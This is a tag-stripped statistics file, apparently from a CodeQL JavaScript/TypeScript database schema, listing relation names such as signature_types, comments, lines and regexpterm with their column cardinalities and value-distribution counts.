-1 -2 -142723 - - - - - - -id -kind - - -12 - - -1 -2 -142723 - - - - - - -id -tostring - - -12 - - -1 -2 -142723 - - - - - - -parent -id - - -12 - - -1 -2 -15702 - - -2 -3 -17715 - - -3 -4 -4729 - - -4 -6 -3778 - - -6 -4205 -3205 - - - - - - -parent -index - - -12 - - -1 -2 -15702 - - -2 -3 -17715 - - -3 -4 -4729 - - -4 -6 -3778 - - -6 -4205 -3205 - - - - - - -parent -kind - - -12 - - -1 -2 -44603 - - -2 -4 -526 - - - - - - -parent -tostring - - -12 - - -1 -2 -15770 - - -2 -3 -17763 - - -3 -4 -4692 - - -4 -6 -3759 - - -6 -4173 -3145 - - - - - - -index -id - - -12 - - -2 -3 -2827 - - -3 -4 -364 - - -4 -6 -358 - - -6 -8 -337 - - -8 -11713 -316 - - -29427 -45130 -2 - - - - - - -index -parent - - -12 - - -2 -3 -2827 - - -3 -4 -364 - - -4 -6 -358 - - -6 -8 -337 - - -8 -11713 -316 - - -29427 -45130 -2 - - - - - - -index -kind - - -12 - - -1 -2 -4149 - - -2 -4 -55 - - - - - - -index -tostring - - -12 - - -1 -2 -2827 - - -2 -3 -364 - - -3 -5 -358 - - -5 -7 -337 - - -7 -6233 -316 - - -16744 -16747 -2 - - - - - - -kind -id - - -12 - - -338 -339 -1 - - -1529 -1530 -1 - - -140856 -140857 -1 - - - - - - -kind -parent - - -12 - - -204 -205 -1 - - -523 -524 -1 - - -45034 -45035 -1 - - - - - - -kind -index - - -12 - - -36 -37 -1 - - -55 -56 -1 - - -4204 -4205 -1 - - - - - - -kind -tostring - - -12 - - -174 -175 -1 - - -880 -881 -1 - - -66649 -66650 -1 - - - - - - -tostring -id - - -12 - - -1 -2 -46301 - - -2 -3 -13295 - - -3 -6 -5112 - - -6 -2975 -2995 - - - - - - -tostring -parent - - -12 - - -1 -2 -46926 - - -2 -3 -13013 - - -3 -7 -5466 - - -7 -2975 -2298 - - - - - - -tostring -index - - -12 - - -1 -2 -61480 - - -2 -4 -5275 - - -4 -43 -948 - - - - - - -tostring -kind - - -12 - - -1 -2 -67703 - - - - - - - - -is_computed -27 - - -id -27 - - - - - -is_method -392 - - -id -392 - - - - - -is_static -36 - - -id -36 - - - - - -type_alias -1386 - - -aliasType -1386 - - -underlyingType -1361 - - - - -underlyingType -aliasType - - -12 - - -1 -2 -1 - - - - - - -aliasType -underlyingType - - -12 - - -1 -2 -1 - - - - - - - - -type_literal_value -31882 - - -typ -31882 - - -value -31828 - - - - -typ -value - - -12 - - -1 -2 -31882 - - - - - - -value -typ - - -12 - - -1 -2 -31774 - - -2 -3 -54 - - - - - - - - -signature_types -46921 - - -id -46921 - - -kind -2 - - -tostring -27460 - - -type_parameters -11 - - -required_params -22 - - - - -id -kind - - -12 - - -1 -2 -46921 - - - - - - -id -tostring - - -12 - - -1 -2 -46921 - - - - - - -id -type_parameters - - -12 - - -1 -2 -46921 - - - - - - -id -required_params - - -12 - - -1 -2 -46921 - - - - - - -kind -id - - -12 - - -2639 -2640 -1 - - -44282 -44283 -1 - - - - - - -kind -tostring - - -12 - - -2200 -2201 -1 - - -25260 -25261 -1 - - - - - - -kind -type_parameters - - -12 - - -4 -5 -1 - - -11 -12 -1 - - - - - - -kind -required_params - - -12 - - -18 -19 -1 - - -19 -20 -1 - - - - - - -tostring -id - - -12 - - -1 -2 -22069 - - -2 -3 -3061 - - -3 -13 -2112 - - -13 -277 -218 - - - - - - -tostring -kind - - -12 - - -1 -2 -27460 - - - - - - -tostring -type_parameters - - -12 - - -1 -2 -27459 - - -2 -3 -1 - - - - - - -tostring -required_params - - -12 - - -1 -2 -27134 - - -2 -10 -326 - - - - - - -type_parameters -id - - -12 - - -1 -2 -1 - - -13 -14 -1 - - -25 -26 -1 - - -34 -35 -1 - - -42 -43 -1 - - -51 -52 -1 - - -74 -75 -1 - - -139 -140 -1 - - -274 -275 -1 - - -5367 -5368 -1 - - -40901 -40902 -1 - - - - - - -type_parameters -kind - - -12 - - -1 -2 -7 - - -2 -3 -4 - - - - - - -type_parameters -tostring - - -12 - - -1 -2 -1 - - -5 -6 -1 - - -6 -7 -2 - - -8 -9 -2 - - -17 -18 -1 - - -18 -19 -1 - - -158 -159 -1 - - -1805 -1806 -1 - - -25429 -25430 -1 - - - - - - -type_parameters -required_params - - -12 - - -1 -2 -1 - - -3 -4 -1 - - -4 -5 -1 - - -5 -6 -1 - - -6 -7 -2 - - -7 -8 -1 - - -8 -9 -2 - - -9 -10 -1 - - -22 -23 -1 - - - - - - -required_params -id - - -12 - - -1 -2 -4 - - -2 -3 -2 - - -3 -5 -2 - - -5 -11 -2 - - -11 -12 -2 - - -44 -131 -2 - - -197 -373 -2 - - -645 -2439 -2 - - -2783 -6853 -2 - - -16407 -17002 -2 - - - - - - -required_params -kind - - -12 - - -1 -2 -7 - - -2 -3 -15 - - - - - - -required_params -tostring - - -12 - - -1 -2 -4 - - -2 -3 -3 - - -4 -5 -1 - - -5 -6 -2 - - -9 -12 -2 - - -39 -62 -2 - - -112 -205 -2 - - -432 -1404 -2 - - -1813 -3662 -2 - - -8431 -11659 -2 - - - - - - -required_params -type_parameters - - -12 - - -1 -2 -12 - - -2 -3 -1 - - -3 -4 -2 - - -5 -7 -2 - - -8 -10 -2 - - -10 -11 -2 - - -11 -12 -1 - - - - - - - - -is_abstract_signature -12 - - -sig -12 - - - - - -signature_rest_parameter -19521 - - -sig -19521 - - -rest_param_arra_type -14259 - - - - -rest_param_arra_type -sig - - -12 - - -1 -2 -1 - - - - - - -sig -rest_param_arra_type - - -12 - - -1 -2 -1 - - - - - - - - -type_contains_signature -87640 - - -typ -68964 - - -kind -2 - - -index -247 - - -sig -37344 - - - - -typ -kind - - -12 - - -1 -2 -68938 - - -2 -3 -26 - - - - - - -typ -index - - -12 - - -1 -2 -59150 - - -2 -3 -5394 - - -3 -248 -4420 - - - - - - -typ -sig - - -12 - - -1 -2 -60034 - - -2 -3 -4557 - - -3 -248 -4373 - - - - - - -kind -typ - - -12 - - -2582 -2583 -1 - - -66408 -66409 -1 - - - - - - -kind -index - - -12 - - -6 -7 -1 - - -247 -248 -1 - - - - - - -kind -sig - - -12 - - -2646 -2647 -1 - - -34698 -34699 -1 - - - - - - -index -typ - - -12 - - -1 -2 -198 - - -2 -3 -21 - - -3 -265 -19 - - -449 -42171 -9 - - - - - - -index -kind - - -12 - - -1 -2 -241 - - -2 -3 -6 - - - - - - -index -sig - - -12 - - -1 -2 -198 - - -2 -3 -24 - - -3 -90 -19 - - -309 -31688 -6 - - - - - - -sig -typ - - -12 - - -1 -2 -35114 - - -2 -896 -2230 - - - - - - -sig -kind - - -12 - - -1 -2 -37344 - - - - - - -sig -index - - -12 - - -1 -2 -36489 - - -2 -9 -855 - - - - - - - - -signature_contains_type -107012 - - -child -26824 - - -parent -37344 - - -index -21 - - - - -child -parent - - -12 - - -1 -2 -19848 - - -2 -3 -3736 - - -3 -7 -2017 - - -7 -10275 -1223 - - - - - - -child -index - - -12 - - -1 -2 -22572 - - -2 -3 -3289 - - -3 -22 -963 - - - - - - -parent -child - - -12 - - -1 -2 -3594 - - -2 -3 -18463 - - -3 -4 -10057 - - -4 -5 -3906 - - -5 -11 -1324 - - - - - - -parent -index - - -12 - - -1 -2 -2649 - - -2 -3 -14810 - - -3 -4 -12007 - - -4 -5 -4294 - - -5 -8 -3055 - - -8 -22 -529 - - - - - - -index -child - - -12 - - -1 -2 -2 - - -2 -3 -6 - - -3 -4 -1 - - -5 -6 -1 - - -9 -10 -1 - - -18 -19 -1 - - -106 -107 -1 - - -313 -314 -1 - - -455 -456 -1 - - -643 -644 -1 - - -1088 -1089 -1 - - -2051 -2052 -1 - - -6862 -6863 -1 - - -8789 -8790 -1 - - -12289 -12290 -1 - - - - - - -index -parent - - -12 - - -2 -3 -1 - - -3 -4 -1 - - -4 -5 -2 - - -5 -6 -1 - - -6 -7 -1 - - -17 -18 -1 - - -22 -23 -1 - - -26 -27 -1 - - -37 -38 -1 - - -45 -46 -1 - - -91 -92 -1 - - -219 -220 -1 - - -529 -530 -1 - - -1042 -1043 -1 - - -1574 -1575 -1 - - -3584 -3585 -1 - - -7878 -7879 -1 - - -19885 -19886 -1 - - -34695 -34696 -1 - - -37344 -37345 -1 - - - - - - - - -signature_parameter_name -69668 - - -sig -34695 - - -index -20 - - -name -4071 - - - - -sig -index - - -12 - - -1 -2 -14810 - - -2 -3 -12007 - - -3 -4 -4294 - - -4 -7 -3055 - - -7 -21 -529 - - - - - - -sig -name - - -12 - - -1 -2 -14810 - - -2 -3 -12007 - - -3 -4 -4294 - - -4 -7 -3055 - - -7 -21 -529 - - - - - - -index -sig - - -12 - - -2 -3 -1 - - -3 -4 -1 - - -4 -5 -2 - - -5 -6 -1 - - -6 -7 -1 - - -17 -18 -1 - - -22 -23 -1 - - -26 -27 -1 - - -37 -38 -1 - - -45 -46 -1 - - -91 -92 -1 - - -219 -220 -1 - - -529 -530 -1 - - -1042 -1043 -1 - - -1574 -1575 -1 - - -3584 -3585 -1 - - -7878 -7879 -1 - - -19885 -19886 -1 - - -34695 -34696 -1 - - - - - - -index -name - - -12 - - -2 -3 -1 - - -3 -4 -1 - - -4 -5 -2 - - -5 -6 -2 - - -11 -12 -1 - - -16 -17 -1 - - -18 -19 -1 - - -24 -25 -1 - - -30 -31 -1 - - -45 -46 -1 - - -63 -64 -1 - - -116 -117 -1 - - -188 -189 -1 - - -344 -345 -1 - - -605 -606 -1 - - -1092 -1093 -1 - - -1741 -1742 -1 - - -2122 -2123 -1 - - - - - - -name -sig - - -12 - - -1 -2 -1898 - - -2 -3 -700 - - -3 -4 -294 - - -4 -5 -262 - - -5 -8 -310 - - -8 -24 -309 - - -24 -3588 -298 - - - - - - -name -index - - -12 - - -1 -2 -2804 - - -2 -3 -738 - - -3 -4 -290 - - -4 -15 -239 - - - - - - - - -number_index_type -2038 - - -baseType -2038 - - -propertyType -517 - - - - -baseType -propertyType - - -12 - - -1 -2 -2038 - - - - - - -propertyType -baseType - - -12 - - -1 -2 -435 - - -2 -3 -70 - - -3 -1259 -12 - - - - - - - - -string_index_type -1102 - - -baseType -1102 - - -propertyType -256 - - - - -baseType -propertyType - - -12 - - -1 -2 -1102 - - - - - - -propertyType -baseType - - -12 - - -1 -2 -219 - - -2 -3 -20 - - -3 -436 -17 - - - - - - - - -base_type_names -941 - - -typeName -928 - - -baseTypeName -369 - - - - -typeName -baseTypeName - - -12 - - -1 -2 -917 - - -2 -4 -11 - - - - - - -baseTypeName -typeName - - -12 - - -1 -2 -175 - - -2 -3 -101 - - -3 -4 -29 - - -4 -5 -29 - - -5 -11 -28 - - -15 -41 -7 - - - - - - - - -self_types -19632 - - -typeName -14119 - - -selfType -19632 - - - - -typeName -selfType - - -12 - - -1 -2 -10451 - - -2 -3 -1823 - - -3 -4 -1845 - - - - - - -selfType -typeName - - -12 - - -1 -2 -19632 - - - - - - - - -tuple_type_min_length -241 - - -typ -241 - - -minLength -10 - - - - -typ -minLength - - -12 - - -1 -2 -241 - - - - - - -minLength -typ - - -12 - - -2 -3 -3 - - -3 -4 -1 - - -4 -5 -1 - - -7 -8 -1 - - -20 -21 -1 - - -42 -43 -1 - - -66 -67 -1 - - -93 -94 -1 - - - - - - - - -tuple_type_rest_index -6 - - -typ -6 - - -index -2 - - - - -typ -index - - -12 - - -1 -2 -6 - - - - - - -index -typ - - -12 - - -1 -2 -1 - - -5 -6 -1 - - - - - - - - -comments -id -104947 - - -id -104947 - - -kind -5 - - -toplevel -4497 - - -text -73454 - - -tostring -57955 - - - - -id -kind - - -12 - - -1 -2 -104947 - - - - - - -id -toplevel - - -12 - - -1 -2 -104947 - - - - - - -id -text - - -12 - - -1 -2 -104947 - - - - - - -id -tostring - - -12 - - -1 -2 -104947 - - - - - - -kind -id - - -12 - - -1 -2 -2 - - -8834 -8835 -1 - - -19270 -19271 -1 - - -76841 -76842 -1 - - - - - - -kind -toplevel - - -12 - - -1 -2 -2 - - -1705 -1706 -1 - - -3107 -3108 -1 - - -3141 -3142 -1 - - - - - - -kind -text - - -12 - - -1 -2 -2 - - -4893 -4894 -1 - - -12759 -12760 -1 - - -55810 -55811 -1 - - - - - - -kind -tostring - - -12 - - -1 -2 -2 - - -1739 -1740 -1 - - -2536 -2537 -1 - - -53678 -53679 -1 - - - - - - -toplevel -id - - -12 - - -1 -2 -1034 - - -2 -3 -512 - - -3 -4 -332 - - -4 -5 -260 - - -5 -7 -388 - - -7 -10 -401 - - -10 -14 -354 - - -14 -21 -365 - - -21 -36 -338 - - -36 -99 -339 - - -99 -6350 -174 - - - - - - -toplevel -kind - - -12 - - -1 -2 -1856 - - -2 -3 -1824 - - -3 -4 -817 - - - - - - -toplevel -text - - -12 - - -1 -2 -1043 - - -2 -3 -533 - - -3 -4 -341 - - -4 -5 -266 - - -5 -7 -396 - - -7 -9 -315 - - -9 -13 -388 - - -13 -20 -385 - - -20 -35 -344 - - -35 -103 -344 - - -103 -4413 -142 - - - - - - -toplevel -tostring - - -12 - - -1 -2 -1054 - - -2 -3 -571 - - -3 -4 -374 - - -4 -5 -297 - - -5 -6 -232 - - -6 -8 -363 - - -8 -11 -345 - - -11 -16 -366 - - -16 -27 -352 - - -27 -60 -338 - - -60 -4394 -205 - - - - - - -text -id - - -12 - - -1 -2 -59626 - - -2 -3 -10314 - - -3 -1417 -3514 - - - - - - -text -kind - - -12 - - -1 -2 -73446 - - -2 -5 -8 - - - - - - -text -toplevel - - -12 - - -1 -2 -62696 - - -2 -3 -8455 - - -3 -257 -2303 - - - - - - -text -tostring - - -12 - - -1 -2 -73446 - - -2 -5 -8 - - - - - - -tostring -id - - -12 - - -1 -2 -44781 - - -2 -3 -9203 - - -3 -4589 -3971 - - - - - - -tostring -kind - - -12 - - -1 -2 -57955 - - - - - - -tostring -toplevel - - -12 - - -1 -2 -48252 - - -2 -3 -7233 - - -3 -513 -2470 - - - - - - -tostring -text - - -12 - - -1 -2 -55262 - - -2 -3403 -2693 - - - - - - - - -types -179398 - - -id -179398 - - -kind -9 - - -tostring -40918 - - - - -id -kind - - -12 - - -1 -2 -179398 - - - - - - -id -tostring - - -12 - - -1 -2 -179398 - - - - - - -kind -id - - -12 - - -1 -2 -5 - - -1802 -1803 -1 - - -6109 -6110 -1 - - -12383 -12384 -1 - - -159099 -159100 -1 - - - - - - -kind -tostring - - -12 - - -1 -2 -5 - - -50 -51 -1 - - -745 -746 -1 - - -7464 -7465 -1 - - -32936 -32937 -1 - - - - - - -tostring -id - - -12 - - -1 -2 -22482 - - -2 -3 -8025 - - -3 -4 -3362 - - -4 -7 -3387 - - -7 -33 -3070 - - -33 -7284 -592 - - - - - - -tostring -kind - - -12 - - -1 -2 -40638 - - -2 -4 -280 - - - - - - - - -type_child -17410 - - -child -9118 - - -parent -7772 - - -idx -296 - - - - -child -parent - - -12 - - -1 -2 -7113 - - -2 -3 -978 - - -3 -8 -686 - - -8 -199 -341 - - - - - - -child -idx - - -12 - - -1 -2 -8255 - - -2 -5 -726 - - -5 -19 -137 - - - - - - -parent -child - - -12 - - -1 -2 -5433 - - -2 -3 -1746 - - -3 -288 -583 - - -288 -297 -10 - - - - - - -parent -idx - - -12 - - -1 -2 -5422 - - -2 -3 -1757 - - -3 -288 -583 - - -288 -297 -10 - - - - - - -idx -child - - -12 - - -1 -2 -1 - - -2 -3 -39 - - -3 -4 -3 - - -4 -5 -61 - - -5 -6 -37 - - -6 -7 -56 - - -7 -12 -22 - - -12 -14 -18 - - -14 -15 -44 - - -17 -6068 -15 - - - - - - -idx -parent - - -12 - - -2 -15 -13 - - -15 -16 -90 - - -19 -20 -81 - - -20 -23 -3 - - -23 -24 -75 - - -24 -55 -23 - - -55 -7773 -11 - - - - - - - - -ast_node_type -1261889 - - -node -1261889 - - -typ -72602 - - - - -node -typ - - -12 - - -1 -2 -1261889 - - - - - - -typ -node - - -12 - - -1 -2 -39248 - - -2 -3 -8371 - - -3 -4 -7888 - - -4 -5 -3053 - - -5 -8 -6417 - - -8 -28 -5528 - - -28 -588233 -2097 - - - - - - - - -declared_function_signature -62664 - - -node -62664 - - -sig -21731 - - - - -node -sig - - -12 - - -1 -2 -62664 - - - - - - -sig -node - - -12 - - -1 -2 -16826 - - -2 -3 -2358 - - -3 -6 -1683 - - -6 -10251 -864 - - - - - - - - -invoke_expr_signature -140668 - - -node -140668 - - -sig -9111 - - - - -node -sig - - -12 - - -1 -2 -140668 - - - - - - -sig -node - - -12 - - -1 -2 -4612 - - -2 -3 -1819 - - -3 -4 -737 - - -4 -6 -696 - - -6 -14 -705 - - -14 -68351 -542 - - - - - - - - -invoke_expr_overload_index -73550 - - -node -73550 - - -index -47 - - - - -node -index - - -12 - - -1 -2 -73550 - - - - - - -index -node - - -12 - - -1 -2 -17 - - -2 -3 -7 - - -3 -5 -4 - - -5 -6 -4 - - -6 -8 -3 - - -8 -16 -4 - - -27 -155 -4 - - -211 -68535 -4 - - - - - - - - -symbols -10192 - - -id -10192 - - -kind -3 - - -name -7872 - - - - -id -kind - - -12 - - -1 -2 -10192 - - - - - - -id -name - - -12 - - -1 -2 -10192 - - - - - - -kind -id - - -12 - - -584 -585 -1 - - -2385 -2386 -1 - - -7223 -7224 -1 - - - - - - -kind -name - - -12 - - -30 -31 -1 - - -2385 -2386 -1 - - -5609 -5610 -1 - - - - - - -name -id - - -12 - - -1 -2 -6929 - - -2 -3 -533 - - -3 -273 -410 - - - - - - -name -kind - - -12 - - -1 -2 -7730 - - -2 -4 -142 - - - - - - - - -symbol_parent -7807 - - -symbol -7807 - - -parent -1727 - - - - -symbol -parent - - -12 - - -1 -2 -7807 - - - - - - -parent -symbol - - -12 - - -1 -2 -778 - - -2 -3 -304 - - -3 -4 -212 - - -4 -5 -111 - - -5 -8 -152 - - -8 -26 -136 - - -26 -297 -34 - - - - - - - - -symbol_module -100 - - -symbol -97 - - -moduleName -98 - - - - -symbol -moduleName - - -12 - - -1 -2 -95 - - -2 -4 -2 - - - - - - -moduleName -symbol - - -12 - - -1 -2 -96 - - -2 -3 -2 - - - - - - - - -symbol_global -354 - - -symbol -354 - - -globalName -350 - - - - -symbol -globalName - - -12 - - -1 -2 -354 - - - - - - -globalName -symbol - - -12 - - -1 -2 -347 - - -2 -4 -3 - - - - - - - - -ast_node_symbol -8173 - - -node -8173 - - -symbol -8155 - - - - -node -symbol - - -12 - - -1 -2 -8173 - - - - - - -symbol -node - - -12 - - -1 -2 -8147 - - -2 -12 -8 - - - - - - - - -type_symbol -12383 - - -typ -12383 - - -symbol -6743 - - - - -typ -symbol - - -12 - - -1 -2 -12383 - - - - - - -symbol -typ - - -12 - - -1 -2 -6240 - - -2 -3070 -503 - - - - - - - - -type_property -331170 - - -typ -49305 - - -name -22420 - - -propertyType -130857 - - - - -typ -name - - -12 - - -1 -2 -10275 - - -2 -3 -14770 - - -3 -4 -6020 - - -4 -5 -3153 - - -5 -6 -1700 - - -6 -7 -4257 - - -7 -19 -3783 - - -19 -23 -3833 - - -23 -1390 -1514 - - - - - - -typ -propertyType - - -12 - - -1 -2 -19351 - - -2 -3 -10786 - - -3 -4 -5073 - - -4 -6 -2639 - - -6 -7 -3864 - - -7 -22 -3334 - - -22 -33 -3710 - - -33 -1390 -548 - - - - - - -name -typ - - -12 - - -1 -2 -4735 - - -2 -3 -7379 - - -3 -4 -2728 - - -4 -5 -1467 - - -5 -7 -1481 - - -7 -11 -1878 - - -11 -30 -1682 - - -30 -7825 -1070 - - - - - - -name -propertyType - - -12 - - -1 -2 -14690 - - -2 -3 -2698 - - -3 -4 -1925 - - -4 -8 -1697 - - -8 -3373 -1410 - - - - - - -propertyType -typ - - -12 - - -1 -2 -112801 - - -2 -3 -12999 - - -3 -19440 -5057 - - - - - - -propertyType -name - - -12 - - -1 -2 -129508 - - -2 -3475 -1349 - - - - - - - - -lines -id -1622184 - - -id -1622184 - - -toplevel -5312 - - -text -648122 - - -terminator -6 - - - - -id -toplevel - - -12 - - -1 -2 -1622184 - - - - - - -id -text - - -12 - - -1 -2 -1622184 - - - - - - -id -terminator - - -12 - - -1 -2 -1622184 - - - - - - -toplevel -id - - -12 - - -1 -12 -425 - - -12 -24 -415 - - -24 -37 -419 - - -37 -50 -404 - - -50 -66 -411 - - -66 -85 -400 - - -85 -108 -405 - - -108 -138 -402 - - -138 -174 -402 - - -174 -232 -405 - - -232 -331 -399 - - -331 -547 -399 - - -548 -4700 -399 - - -4783 -277404 -27 - - - - - - -toplevel -text - - -12 - - -1 -11 -441 - - -11 -21 -427 - - -21 -30 -414 - - -30 -40 -452 - - -40 -51 -435 - - -51 -64 -413 - - -64 -79 -404 - - -79 -96 -401 - - -96 -121 -400 - - -121 -158 -401 - - -158 -220 -399 - - -220 -387 -401 - - -388 -60934 -324 - - - - - - -toplevel -terminator - - -12 - - -1 -2 -5046 - - -2 -6 -266 - - - - - - -text -id - - -12 - - -1 -2 -513961 - - -2 -3 -84265 - - -3 -49 -48993 - - -49 -175121 -903 - - - - - - -text -toplevel - - -12 - - -1 -2 -569267 - - -2 -3 -56143 - - -3 -5068 -22712 - - - - - - -text -terminator - - -12 - - -1 -2 -647931 - - -2 -4 -191 - - - - - - -terminator -id - - -12 - - -3 -4 -3 - - -349 -350 -1 - - -1830 -1831 -1 - - -1619996 -1619997 -1 - - - - - - -terminator -toplevel - - -12 - - -3 -4 -3 - - -11 -12 -1 - - -349 -350 -1 - - -5218 -5219 -1 - - - - - - -terminator -text - - -12 - - -1 -2 -3 - - -110 -111 -1 - - -1093 -1094 -1 - - -647111 -647112 -1 - - - - - - - - -indentation -1145010 - - -file -5728 - - -lineno -40788 - - -indentChar -2 - - -indentDepth -72 - - - - -file -lineno - - -12 - - -1 -9 -440 - - -9 -18 -471 - - -18 -29 -439 - - -29 -41 -451 - - -41 -54 -460 - - -54 -71 -442 - - -71 -91 -441 - - -91 -118 -430 - - -118 -152 -432 - - -152 -205 -434 - - -205 -295 -431 - - -295 -503 -430 - - -503 -38151 -427 - - - - - - -file -indentChar - - -12 - - -1 -2 -5692 - - -2 -3 -36 - - - - - - -file -indentDepth - - -12 - - -1 -2 -287 - - -2 -3 -401 - - -3 -4 -665 - - -4 -5 -815 - - -5 -6 -814 - - -6 -7 -687 - - -7 -8 -567 - - -8 -9 -390 - - -9 -11 -503 - - -11 -17 -462 - - -17 -67 -137 - - - - - - -lineno -file - - -12 - - -1 -2 -10935 - - -2 -3 -5303 - - -3 -4 -12061 - - -4 -6 -3644 - - -6 -13 -3223 - - -13 -31 -3090 - - -31 -3986 -2532 - - - - - - -lineno -indentChar - - -12 - - -1 -2 -38720 - - -2 -3 -2068 - - - - - - -lineno -indentDepth - - -12 - - -1 -2 -11626 - - -2 -3 -7847 - - -3 -4 -10434 - - -4 -5 -2688 - - -5 -8 -3316 - - -8 -13 -3144 - - -13 -39 -1733 - - - - - - -indentChar -file - - -12 - - -42 -43 -1 - - -5722 -5723 -1 - - - - - - -indentChar -lineno - - -12 - - -2068 -2069 -1 - - -40788 -40789 -1 - - - - - - -indentChar -indentDepth - - -12 - - -10 -11 -1 - - -72 -73 -1 - - - - - - -indentDepth -file - - -12 - - -1 -6 -6 - - -6 -9 -6 - - -9 -20 -6 - - -21 -30 -6 - - -38 -57 -6 - - -59 -90 -6 - - -90 -124 -6 - - -132 -160 -6 - - -165 -211 -6 - - -213 -337 -6 - - -377 -1532 -6 - - -1919 -5487 -6 - - - - - - -indentDepth -lineno - - -12 - - -2 -8 -6 - - -11 -19 -6 - - -25 -44 -6 - - -53 -67 -6 - - -67 -89 -6 - - -102 -169 -6 - - -183 -239 -6 - - -269 -411 -6 - - -417 -971 -6 - - -1129 -2732 -6 - - -4374 -9301 -6 - - -11828 -21226 -6 - - - - - - -indentDepth -indentChar - - -12 - - -1 -2 -62 - - -2 -3 -10 - - - - - - - - -js_parse_errors -3 - - -id -3 - - -toplevel -3 - - -message -1 - - -line -3 - - - - -id -toplevel - - -12 - - -1 -2 -3 - - - - - - -id -message - - -12 - - -1 -2 -3 - - - - - - -id -line - - -12 - - -1 -2 -3 - - - - - - -toplevel -id - - -12 - - -1 -2 -3 - - - - - - -toplevel -message - - -12 - - -1 -2 -3 - - - - - - -toplevel -line - - -12 - - -1 -2 -3 - - - - - - -message -id - - -12 - - -3 -4 -1 - - - - - - -message -toplevel - - -12 - - -3 -4 -1 - - - - - - -message -line - - -12 - - -3 -4 -1 - - - - - - -line -id - - -12 - - -1 -2 -3 - - - - - - -line -toplevel - - -12 - - -1 -2 -3 - - - - - - -line -message - - -12 - - -1 -2 -3 - - - - - - - - -regexpterm -id -33197 - - -id -33197 - - -kind -25 - - -parent -13313 - - -idx -76 - - -tostring -4610 - - - - -id -kind - - -12 - - -1 -2 -33197 - - - - - - -id -parent - - -12 - - -1 -2 -33197 - - - - - - -id -idx - - -12 - - -1 -2 -33197 - - - - - - -id -tostring - - -12 - - -1 -2 -33197 - - - - - - -kind -id - - -12 - - -1 -4 -2 - - -7 -12 -2 - - -12 -16 -2 - - -59 -100 -2 - - -146 -265 -2 - - -445 -479 -2 - - -599 -620 -2 - - -637 -642 -2 - - -826 -1058 -2 - - -1067 -1474 -2 - - -1573 -1693 -2 - - -2613 -3372 -2 - - -15489 -15490 -1 - - - - - - -kind -parent - - -12 - - -1 -4 -2 - - -7 -8 -1 - - -11 -12 -2 - - -15 -46 -2 - - -79 -132 -2 - - -132 -331 -2 - - -367 -381 -2 - - -437 -638 -2 - - -641 -737 -2 - - -825 -1005 -2 - - -1391 -1403 -2 - - -1465 -1645 -2 - - -2691 -3963 -2 - - - - - - -kind -idx - - -12 - - -1 -2 -2 - - -2 -3 -2 - - -4 -5 -3 - - -6 -8 -2 - - -12 -15 -2 - - -17 -19 -2 - - -19 -21 -2 - - -22 -23 -1 - - -23 -24 -2 - - -25 -27 -2 - - -27 -30 -2 - - -42 -49 -2 - - -73 -74 -1 - - - - - - -kind -tostring - - -12 - - -1 -2 -6 - - -2 -5 -2 - - -6 -11 -2 - - -13 -28 -2 - - -31 -59 -2 - - -65 -78 -2 - - -100 -118 -2 - - -149 -171 -2 - - -175 -391 -2 - - -433 -791 -2 - - -1992 -1993 -1 - - - - - - -parent -id - - -12 - - -1 -2 -7691 - - -2 -3 -2568 - - -3 -4 -924 - - -4 -7 -1189 - - -7 -77 -941 - - - - - - -parent -kind - - -12 - - -1 -2 -10080 - - -2 -3 -2026 - - -3 -5 -1068 - - -5 -9 -139 - - - - - - -parent -idx - - -12 - - -1 -2 -7691 - - -2 -3 -2568 - - -3 -4 -924 - - -4 -7 -1189 - - -7 -77 -941 - - - - - - -parent -tostring - - -12 - - -1 -2 -7733 - - -2 -3 -2644 - - -3 -4 -940 - - -4 -7 -1230 - - -7 -32 -766 - - - - - - -idx -id - - -12 - - -1 -2 -7 - - -2 -3 -9 - - -4 -8 -7 - - -8 -13 -7 - - -15 -22 -6 - - -26 -35 -5 - - -37 -51 -6 - - -53 -75 -6 - - -79 -141 -6 - - -186 -325 -6 - - -385 -1182 -6 - - -1578 -13314 -5 - - - - - - -idx -kind - - -12 - - -1 -2 -18 - - -2 -3 -15 - - -3 -4 -8 - - -4 -5 -7 - - -5 -8 -6 - - -9 -13 -6 - - -13 -16 -7 - - -17 -20 -7 - - -21 -25 -2 - - - - - - -idx -parent - - -12 - - -1 -2 -7 - - -2 -3 -9 - - -4 -8 -7 - - -8 -13 -7 - - -15 -22 -6 - - -26 -35 -5 - - -37 -51 -6 - - -53 -75 -6 - - -79 -141 -6 - - -186 -325 -6 - - -385 -1182 -6 - - -1578 -13314 -5 - - - - - - -idx -tostring - - -12 - - -1 -2 -8 - - -2 -3 -8 - - -3 -4 -4 - - -5 -7 -6 - - -7 -10 -6 - - -10 -15 -6 - - -16 -21 -7 - - -21 -26 -6 - - -29 -48 -6 - - -48 -75 -6 - - -82 -147 -6 - - -158 -940 -6 - - -3258 -3259 -1 - - - - - - -tostring -id - - -12 - - -1 -2 -3026 - - -2 -3 -751 - - -3 -5 -391 - - -5 -49 -346 - - -49 -1013 -96 - - - - - - -tostring -kind - - -12 - - -1 -2 -4605 - - -2 -3 -5 - - - - - - -tostring -parent - - -12 - - -1 -2 -3041 - - -2 -3 -746 - - -3 -5 -389 - - -5 -53 -346 - - -54 -875 -88 - - - - - - -tostring -idx - - -12 - - -1 -2 -4102 - - -2 -5 -351 - - -5 -58 -157 - - - - - - - - -regexp_parse_errors -id -122 - - -id -122 - - -regexp -41 - - -message -5 - - - - -id -regexp - - -12 - - -1 -2 -122 - - - - - - -id -message - - -12 - - -1 -2 -122 - - - - - - -regexp -id - - -12 - - -1 -2 -7 - - -2 -3 -9 - - -3 -4 -12 - - -4 -5 -5 - - -5 -6 -7 - - -6 -7 -1 - - - - - - -regexp -message - - -12 - - -1 -2 -18 - - -2 -3 -4 - - -3 -4 -19 - - - - - - -message -id - - -12 - - -1 -2 -1 - - -8 -9 -1 - - -22 -23 -1 - - -23 -24 -1 - - -68 -69 -1 - - - - - - -message -regexp - - -12 - - -1 -2 -1 - - -2 -3 -1 - - -22 -23 -1 - - -23 -24 -1 - - -35 -36 -1 - - - - - - - - -is_greedy -2629 - - -id -2629 - - - - - -isOptionalChaining -100 - - -id -100 - - - - - - -range_quantifier_lower_bound -146 - - -id -146 - - -lo -11 - - - - -id -lo - - -12 - - -1 -2 -146 - - - - - - -lo -id - - -12 - - -1 -2 -4 - - -4 -5 -1 - - -5 -6 -1 - - -17 -18 -1 - - -20 -21 -1 - - -28 -29 -1 - - -33 -34 -1 - - -35 -36 -1 - - - - - - - - -range_quantifier_upper_bound -45 - - -id -45 - - -hi -13 - - - - -id -hi - - -12 - - -1 -2 -45 - - - - - - -hi -id - - -12 - - 